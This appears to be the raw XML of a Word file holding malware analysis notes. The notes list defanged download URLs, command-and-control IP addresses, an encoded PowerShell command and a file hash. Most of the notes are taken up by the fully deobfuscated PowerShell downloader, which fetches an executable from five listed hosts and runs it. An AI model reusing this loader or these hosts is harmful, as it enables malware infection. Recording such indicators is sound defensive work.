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1378" w14:textId="5FC58557" w:rsidR="00707E20" w:rsidRDefault="008220C0" w:rsidP="00707E20">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="008220C0">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidRPr="008220C0">
        <w:t>p://memtreat</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008220C0">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="008220C0">
        <w:t>com/TOn9K51QK1pJ2qI_SKaebFAz/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FB66E" w14:textId="67F683C3" w:rsidR="008220C0" w:rsidRDefault="008220C0" w:rsidP="00707E20">
      <w:r w:rsidRPr="00D920DF">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>p://medongho</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>vn/SVm5yC0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C65C72" w14:textId="1744E885" w:rsidR="008220C0" w:rsidRDefault="008220C0" w:rsidP="00707E20">
      <w:r w:rsidRPr="00D920DF">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>p://otojack.co</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>id/wp-content/uploads/xvVQc2RzdDhTWswVa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC9F95" w14:textId="723FC1F2" w:rsidR="008220C0" w:rsidRDefault="00EA4B81" w:rsidP="00707E20">
      <w:r w:rsidRPr="00D920DF">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>p://ptmmf.co</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>id/uNVMPELTQ_ldQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679D94F" w14:textId="09CB9F44" w:rsidR="00707E20" w:rsidRDefault="00EA4B81" w:rsidP="00707E20">
      <w:r w:rsidRPr="00D920DF">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>p://potlackariet</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D920DF">
        <w:t>sk/bXfkJ2SeKd7g</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="248A538E" w14:textId="77777777" w:rsidR="00EA4B81" w:rsidRDefault="00EA4B81" w:rsidP="00707E20"/>
    <w:p w14:paraId="5037BA42" w14:textId="4D4C62DF" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:r>
        <w:t>0x3e7030 (15): 189.234.165.149</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F163C0" w14:textId="77777777" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:r>
        <w:t xml:space="preserve">0x41299a (25): tp://208.78.100.202:8080/ - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Malnets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B8C7433" w14:textId="77777777" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:r>
        <w:t>0x412b1a (23): tp://98.186.90.192:443/ - Uncategorised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16528BE4" w14:textId="77777777" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:r>
        <w:t>0x437e92 (44): ttp://73.124.73.90:20/ - Uncategorised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD689D" w14:textId="77777777" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:r>
        <w:t>0x4465da (25): tp://78.187.172.138:7080/ - Uncategorised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DDFD54" w14:textId="77777777" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20"/>
    <w:p w14:paraId="1F652C9D" w14:textId="1D50FBF1" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:r>
        <w:t>powershell.exe [2968]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A8BCC" w14:textId="076D4FFE" w:rsidR="00707E20" w:rsidRDefault="00707E20" w:rsidP="00707E20">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -e 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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>AGsASgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwBGAHcAdABsAGMAUgA9ACgAJwBKAG0ARQA5AE4AJwArACcASgBtAGQAJwApADsA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608035F5" w14:textId="77777777" w:rsidR="00A86D69" w:rsidRDefault="00A86D69"/>
    <w:p w14:paraId="5169D9D5" w14:textId="64D6B39E" w:rsidR="00A86D69" w:rsidRDefault="00A86D69"/>
    <w:p w14:paraId="1BB59C2D" w14:textId="213533C8" w:rsidR="00A86D69" w:rsidRDefault="00A86D69"/>
    <w:p w14:paraId="3AC47422" w14:textId="22CC4C6D" w:rsidR="00A86D69" w:rsidRDefault="00A86D69">
      <w:r w:rsidRPr="00A86D69">
        <w:t xml:space="preserve">$.j.4.C.n.6.J.z.=.(.'.D.'.+.'.A.o.F.K.'.+.'.B.w.V.'.).;.$.n.B.O.K.7.Y.Y.=.n.e.w.-.o.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.O.h.H.l.C.7.j.t.=.(.'.h.t.t.p.:.'.+.'././.'.+.'.m.e.m.t.r.e.'.+.'.a.t.'.+.'...c.o.m./.T.O.'.+.'.n.9.'.+.'.K.5.'.+.'.1.Q.K.1.p.J.2.q.I.'.+.'._.S.K.a.e.b.F.A.z.'.+.'.@.h.'.+.'.t.t.p.:.'.+.'././.m.e.d.o.'.+.'.n.g.h.o...v.'.+.'.n./.S.V.m.5.y.C.0.s.'.+.'.w._.C.x.@.h.t.t.p.:./.'.+.'./.o.'.+.'.t.o.j.a.c.k...'.+.'.c.'.+.'.o...'.+.'.i.d.'.+.'./.w.p.-.c.o.'.+.'.n.t.e.n.t./.u.'.+.'.p.l.'.+.'.o.a.d.s./.x.v.'.+.'.V.Q.c.2.R.z.d.D.h.'.+.'.T.W.s.w.V.'.+.'.a.'.+.'.@.h.t.t.'.+.'.p.:././.p.'.+.'.t.m.m.f...c.o...i.'.+.'.d./.u.N.V.M.P.E.L.T.Q._.l.'.+.'.d.'.+.'.Q.@.h.t.'.+.'.t.p.:././.p.o.t.l.'.+.'.a.c.k.'.+.'.a.r.i.'.+.'.e.t.'.+.'...s.k./.b.X.f.k.'.+.'.J.'.+.'.2.S.e.K.d.'.+.'.7.'.+.'.g.'.)...S.p.l.i.t.(.'.@.'.).;.$.M.q.D.W.C.T.j.=.(.'.u.w.z.w.'.+.'.2.z.'.).;.$.z.G.8.U.Z.o.8. .=. .(.'.3.1.'.+.'.9.'.).;.$.V.M.Q.N.r.R.K.=.(.'.v.6.7.f.E.j.'.+.'.k.'.+.'.R.'.).;.$.C.H.Z.C.1.E.P.=.$.e.n.v.:.u.s.e.r.p.r.o.f.i.l.e.+.'.\.'.+.$.z.G.8.U.Z.o.8.+.(.'...e.'.+.'.x.e.'.).;.f.o.r.e.a.c.h.(.$.K.b.u.X.J.0. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>i.n.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t xml:space="preserve"> .$.O.h.H.l.C.7.j.t.).{.t.r.y.{.$.n.B.O.K.7.Y.Y...D.o.w.n.l.o.a.d.F.i.l.e.(.$.K.b.u.X.J.0.,. .</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>$.C.H.Z.C.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>1.E.P.).;.$.b.0.U.Y.j.m.P.=.(.'.L.w.R.2.'.+.'.9.'.+.'.R.'.).;.I.f. .(.(.G.e.t.-.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>I.t.e.m</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>. .$.C.H.Z.C.1.E.P.)...</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>l.e.n.g.t.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>. .-.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>g.e.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t xml:space="preserve"> .4.0.0.0.0.). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>.{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>.I.n.v.o.k.e.-.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>I.t.e.m</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A86D69">
        <w:t>. .$.C.H.Z.C.1.E.P.;.$.G.A.0.v.L.D.U.m.=.(.'.U.r.Q.M.'.+.'.k.J.'.).;.b.r.e.a.k.;.}.}.c.a.t.c.h.{.}.}.$.c.F.w.t.l.c.R.=.(.'.J.m.E.9.N.'.+.'.J.m.d.'.).;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129CBEA1" w14:textId="77777777" w:rsidR="00A86D69" w:rsidRDefault="00A86D69"/>
    <w:p w14:paraId="4358C461" w14:textId="31A2E64D" w:rsidR="00C774C1" w:rsidRDefault="00D920DF">
      <w:r w:rsidRPr="00D920DF">
        <w:t>$j4Cn6Jz=('D'+'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D920DF">
        <w:t>AoFK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D920DF">
        <w:t>'+'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D920DF">
        <w:t>BwV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D920DF">
        <w:t>');$nBOK7YY=new-object Net.WebClient;$OhHlC7jt=('http:'+'//'+'memtre'+'at'+'.com/TO'+'n9'+'K5'+'1QK1pJ2qI'+'_SKaebFAz'+'@h'+'ttp:'+'//medo'+'ngho.v'+'n/SVm5yC0s'+'w_Cx@http:/'+'/o'+'tojack.'+'c'+'o.'+'id'+'/wp-co'+'ntent/u'+'pl'+'oads/xv'+'VQc2RzdDh'+'TWswV'+'a'+'@htt'+'p://p'+'tmmf.co.i'+'d/uNVMPELTQ_l'+'d'+'Q@ht'+'tp://potl'+'ack'+'ari'+'et'+'.sk/bXfk'+'J'+'2SeKd'+'7'+'g').Split('@');$MqDWCTj=('uwzw'+'2z');$zG8UZo8 = ('31'+'9');$VMQNrRK=('v67fEj'+'k'+'R');$CHZC1EP=$env:userprofile+'\'+$zG8UZo8+('.e'+'xe');foreach($KbuXJ0 in $OhHlC7jt){try{$nBOK7YY.DownloadFile($KbuXJ0, $CHZC1EP);$b0UYjmP=('LwR2'+'9'+'R');If ((Get-Item $CHZC1EP).length -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D920DF">
        <w:t>ge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D920DF">
        <w:t xml:space="preserve"> 40000) {Invoke-Item $CHZC1EP;$GA0vLDUm=('UrQM'+'kJ');break;}}catch{}}$cFwtlcR=('JmE9N'+'Jmd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A76E7D" w14:textId="543C9561" w:rsidR="00707E20" w:rsidRDefault="00707E20">
      <w:r w:rsidRPr="00707E20">
        <w:t>C:\Users\Administrator\Desktop\slidemenus.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333B9503" w14:textId="0B613DD2" w:rsidR="00707E20" w:rsidRDefault="00707E20">
      <w:r w:rsidRPr="00707E20">
        <w:t>abac88c5e2220d78d2c835e138a6d78a</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0070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F"/>
    <w:rsid w:val="002748A9"/>
    <w:rsid w:val="00707E20"/>
    <w:rsid w:val="00821872"/>
    <w:rsid w:val="008220C0"/>
    <w:rsid w:val="00A86D69"/>
    <w:rsid w:val="00D920DF"/>
    <w:rsid w:val="00EA4B81"/>
    <w:rsid w:val="00E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6E6E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{75B8BF1B-E15C-4CB4-88D9-06F93917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Fox</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Neil Fox</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-08T10:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-08T14:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>